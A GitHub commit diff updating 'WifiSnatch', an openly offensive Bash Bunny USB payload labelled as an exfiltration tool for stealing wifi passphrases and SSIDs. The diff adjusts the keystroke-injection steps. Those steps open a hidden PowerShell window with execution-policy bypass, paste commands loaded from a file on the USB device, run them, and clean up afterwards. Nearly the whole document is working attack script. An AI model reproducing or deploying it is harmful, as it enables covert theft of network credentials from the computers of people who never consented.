Updated WifiSnatch

Fixed multiple mistakes
pull/491/head
0iphor13 2022-02-02 09:23:59 +01:00 committed by GitHub
parent 605ce41662
commit 1eb60b48e7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 10 deletions

View File

@ -3,7 +3,7 @@
# Title: WifiSnatch
# Description: Extract wifi information, such as passphrases & SSIDs
# Author: 0iphor13
# Version: 1.0
# Version: 1.1
# Category: Exfiltration
# Attackmodes: HID, Storage
@ -20,18 +20,19 @@ ATTACKMODE HID STORAGE
LED STAGE1
DELAY 5000
Q DELAY 1500
RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
DELAY 5000
Q DELAY 500
Q ENTER
Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))"
DELAY 10000
Q DELAY 2000
Q ENTER
DELAY 10000
Q DELAY 1000
Q CONTROL v
DELAY 10000
Q DELAY 1000
Q ENTER
DELAY 1000
Q DELAY 1000
LED STAGE2
@ -44,12 +45,12 @@ LED CLEANUP
rm /root/udisk/DONE
DELAY 100
Q DELAY 100
sync
DELAY 100
Q DELAY 100
LED FINISH
#SAVE TO EJECT
#SAVE TO EJECT